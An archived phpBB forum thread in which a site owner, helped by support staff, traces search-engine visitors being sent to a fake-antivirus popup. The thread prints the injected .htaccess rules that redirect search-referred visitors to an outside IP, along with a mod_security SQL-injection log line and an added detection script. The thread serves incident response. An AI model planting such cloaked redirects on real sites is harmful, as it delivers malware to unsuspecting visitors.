Clicking link in Google launches Spyware

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Clicking link in Google launches Spyware

Post by moocamp »

Hi,

I'm a bit concerned that I might have some sort of spyware installed within my forum, and would appreciate some advice.

If I type the address into the address bar (www.moocamp.com), then it takes me to the page ok, but if I click a link from Google, (fourth link down on this page: http://www.google.co.uk/search?hl=en&q= ... rt=10&sa=N ) then it pops up a window and tries to get me to download some antivirus tool or other.

It only does it for this link, and I've had another user report the same problem - can anyone advise what might be going on?
Last edited by ric323 on Sun Aug 10, 2008 11:11 pm, edited 1 time in total.
Reason: Topic icon changed

KevC
Support Team Member
Posts: 69553
Joined: Fri Jun 04, 2004 10:44 am
Location: Oxford, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by KevC »

Never seen that before but I reckon you should contact google.
The identical link for your site works fine so it must be their end. It seems to be redirected away from what google thinks is your site. It just goes straight to the spam link. If you turn off javascript on your browser you'll see what happens.

Incidentally, you have a huge spam problem. Check out the sticky at the top of this forum for a simple fix.
-:|:- Support Request Template -:|:-
Cheap UK Hosting
"In the land of the blind the little green bloke with no pupils is king - init!"

ChrisRLG
Former Team Member
Posts: 3420
Joined: Wed Nov 24, 2004 3:18 pm
Location: Essex, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by ChrisRLG »

I asked a few of my friends.

One suggestion is that this is due to the ongoing +DNS exploits.
Derek wrote: I am guessing that one of the +DNS exploits has been done on the name servers for moocamp

I suspect that NS39.EUKDNS.COM has been compromised & any google or probably other search engine referrers to that server get diverted.
I checked and yahoo does the same thing. So he is probably right.

The DNS system is currently being attacked by such exploits in a big way.

It does not look like your own machine is infected, but you might like to tell your hosting co that their DNS server may be compromised.

====

Word of warning to anyone reading this.

To follow those links from google could get your own system infected, if you are not on a fully patched windows system. If you do get a warning box saying that you might be infected, close the box by clicking the red close icon in the right hand top corner - never from the cancel or such buttons.

If you do not follow that advice and get infected please follow this link and get support from an expert at removal.
approved by the Incident Investigation Team wrote: For cleaning of your own or your users' PCs that may have become infected from this incident, a third-party website can provide further help. The website contains a list of forums manned by specially trained experts in cleaning Microsoft Windows Client Machines (such as Vista & Windows XP). Not something that can be done here at phpBB.com.
phpBB: The All Important Rules - Bertie Bear 3.0 - No support via PM system - use the forums please.
phpBB v2: Retirement (1/1/2009) : phpBB v3: Read Me Topic - Custom BBCodes - Support Template
Matthew 7:7"Ask and it will be given to you; seek and you will find; knock and a door will be opened to you."
My Links: MS MVP (Consumer Security) - Malware Removal:University - Own Forum: Custom BBCode testing

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

Kevin Clark wrote: Never seen that before but I reckon you should contact google.
The identical link for your site works fine so it must be their end. It seems to be redirected away from what google thinks is your site. It just goes straight to the spam link. If you turn off javascript on your browser you'll see what happens.

Incidentally, you have a huge spam problem. Check out the sticky at the top of this forum for a simple fix.
Thanks Kevin.

Any ideas how you contact google?

As for the spam problem, what did you see that identified it as huge (or as a problem at all)? The forum is set to Admin approve, and I do get a fair amount of spam accounts set up. I've installed the "redirect anonymous users to log in" mod, which I'm guessing was the simple fix you referred to (can you let me know if it wasn't?).

Mick.

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

ChrisRLG wrote: I asked a few of my friends.

One suggestion is that this is due to the ongoing +DNS exploits.
Derek wrote: I am guessing that one of the +DNS exploits has been done on the name servers for moocamp

I suspect that NS39.EUKDNS.COM has been compromised & any google or probably other search engine referrers to that server get diverted.
I checked and yahoo does the same thing. So he is probably right.

The DNS system is currently being attacked by such exploits in a big way.

It does not look like your own machine is infected, but you might like to tell your hosting co that their DNS server may be compromised.

====

Word of warning to anyone reading this.

To follow those links from google could get your own system infected, if you are not on a fully patched windows system. If you do get a warning box saying that you might be infected, close the box by clicking the red close icon in the right hand top corner - never from the cancel or such buttons.

If you do not follow that advice and get infected please follow this link and get support from an expert at removal.
approved by the Incident Investigation Team wrote: For cleaning of your own or your users' PCs that may have become infected from this incident, a third-party website can provide further help. The website contains a list of forums manned by specially trained experts in cleaning Microsoft Windows Client Machines (such as Vista & Windows XP). Not something that can be done here at phpBB.com.

Cheers Chris - I'll have a word with them.

ChrisRLG
Former Team Member
Posts: 3420
Joined: Wed Nov 24, 2004 3:18 pm
Location: Essex, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by ChrisRLG »

Please do. We (Derek & myself) checked the website page for that machine - it has some hidden links to spam-like sites - so is almost certainly infected.

This is part of the source code from eukdns.com

Code:

<u style=display:none>
<a href=http://www.woficlub.com>personal finance</a>
<a href=http://www.woficlub.com/press/news>financial news</a>
<a href=http://www.woficlub.com/forum>financial help</a>
<a href=http://www.woficlub.com/Articles>financial articles</a>
<a href=http://woficlub.com/Articles/Mortgage/>mortgage refinance</a>
<a href=http://woficlub.com/Articles/Loan/>loan personal</a>
<a href=http://woficlub.com/Articles/Payday>payday loan</a>
<a href=http://woficlub.com/LinkExchange>link exchange</a></u><body><!--LinkToOtherRandom--><p>

Can see no reason for those sorts of links to be present in your host's website pages.

KevC
Support Team Member
Posts: 69553
Joined: Fri Jun 04, 2004 10:44 am
Location: Oxford, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by KevC »

moocamp wrote:
As for the spam problem, what did you see that identified it as huge (or as a problem at all)? The forum is set to Admin approve, and I do get a fair amount of spam accounts set up. I've installed the "redirect anonymous users to log in" mod, which I'm guessing was the simple fix you referred to (can you let me know if it wasn't?).

Mick.
When I looked earlier I was able to scan the memberlist. It's full of spambot names. They look typically bot-ish anyway. The simple fix I was referring to is the RAC MOD. It will stop the bots registering in the first place. That will take a lot of grief away from you having to check every account to decide on activation as they simply won't get that far.

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

Thanks guys.

I'm in a 'chat' with their tech support guys at the moment, and they're saying that they aren't getting the same pop up. They're looking into it at the moment, but have just posted that they have "found above logs for my domain"
[Sun Aug 10 22:38:06 2008] [error] [client 79.65.254.87] mod_security: Warning. Pattern match "select.+from" at POST_PAYLOAD [msg "SQL Injection attack"] [severity "EMERGENCY"] [hostname "moocamp.com"] [uri "/privmsg.php"] [unique_id "SJ9fvld14HMAAAkCNzU"]
I've asked what it means, but they have yet to respond - does it mean anything to you?

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

Kevin Clark wrote:
moocamp wrote:
As for the spam problem, what did you see that identified it as huge (or as a problem at all)? The forum is set to Admin approve, and I do get a fair amount of spam accounts set up. I've installed the "redirect anonymous users to log in" mod, which I'm guessing was the simple fix you referred to (can you let me know if it wasn't?).

Mick.
When I looked earlier I was able to scan the memberlist. It's full of spambot names. They look typically bot-ish anyway. The simple fix I was referring to is the RAC MOD. It will stop the bots registering in the first place. That will take a lot of grief away from you having to check every account to decide on activation as they simply won't get that far.
Thanks Kevin - there are a few spam names on there, but they're just the ones from today :cry: I'll go and look at the RAC mod - thanks for the advice.

ChrisRLG
Former Team Member
Posts: 3420
Joined: Wed Nov 24, 2004 3:18 pm
Location: Essex, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by ChrisRLG »

That is not the same thing at all.

That is an SQL attack against your own website which the Mod_security script stopped.

They happen almost as background noise against most websites.

You can try to get that machine (The IP code) cleaned by reporting them to their hosting company. But it has nothing to do with the DNS infection.

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

He's renamed prvmsg.php saying that it's infected.

and it seems to have solved the problem (but obviously broken the pm system)

Help.

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

The PM system seems to be ok now.

The popup seems to have disappeared.

At present, the best explanation I've got of what happened is:
I have found some rewrite rule in .htaccess file under home directory

that .htaccess file uploaded by some one cause of that problem
Does that make any sense?

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

OK - detail of what was found:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* hxxp://87.248.180.90/in.html?s=sg [R,L]
Errordocument 404 hxxp://87.248.180.90/in.html?s=sg_err

above code was in .htaccess file
He's deleted the .htaccess file and advised me to change my cpanel password, which I've done.

Does this make sense?
Last edited by ChrisRLG on Sun Aug 10, 2008 10:35 pm, edited 1 time in total.
Reason: disabled live malware links
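
The rules quoted in the post above redirect only when the Referer header names a search engine, which is why typing the address directly showed nothing wrong. A check a site owner could run over their own .htaccess files to flag that pattern (an added example, not part of the original thread; the function names, the sample text and the 192.0.2.10 placeholder address are constructed for illustration):

```python
import re
from urllib.parse import urlsplit

ABS_URL = re.compile(r"^h(?:tt|xx)ps?://", re.I)  # also accepts defanged hxxp://

# Constructed sample modelled on the rules quoted above; 192.0.2.10 is a
# documentation-range placeholder, not the address from the thread.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://192.0.2.10/in.html?s=sg [R,L]
ErrorDocument 404 http://192.0.2.10/in.html?s=sg_err
RewriteCond %{HTTP_HOST} !^www [NC]
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]
"""

def external_host(target, own_hosts):
    """Return the host of an absolute URL that is not one of ours, else None."""
    if not ABS_URL.match(target):
        return None
    host = (urlsplit(target).hostname or "").lower()
    return None if host in own_hosts else host

def scan_htaccess(text, own_hosts=()):
    """List (line, kind, host, referer_patterns) for suspicious directives."""
    own = {h.lower() for h in own_hosts}
    findings, referer_conds = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if len(parts) < 3 or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond":
            if "http_referer" in parts[1].lower():
                referer_conds.append(parts[2])
        elif directive == "rewriterule":
            host = external_host(parts[2], own)
            if host and referer_conds:  # off-site redirect gated on Referer
                findings.append((lineno, "referer-redirect", host, referer_conds))
            referer_conds = []  # conditions only apply to the next RewriteRule
        elif directive == "errordocument":
            host = external_host(parts[2], own)
            if host:  # error pages served from someone else's server
                findings.append((lineno, "external-errordocument", host, []))
    return findings

if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE, own_hosts=["www.example.org"]):
        print(finding)
```

The ordinary canonical-host redirect at the end of the sample is not flagged, because it is not conditioned on the Referer and points at the site's own host.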

ChrisRLG
Former Team Member
Posts: 3420
Joined: Wed Nov 24, 2004 3:18 pm
Location: Essex, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by ChrisRLG »

Yes it does make sense.

It looks like you were infected from the cpanel (not phpBB) which is probably not the latest version.

They should still take a look at their own website page - which has those spam links.

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

Thanks for all your help Chris.
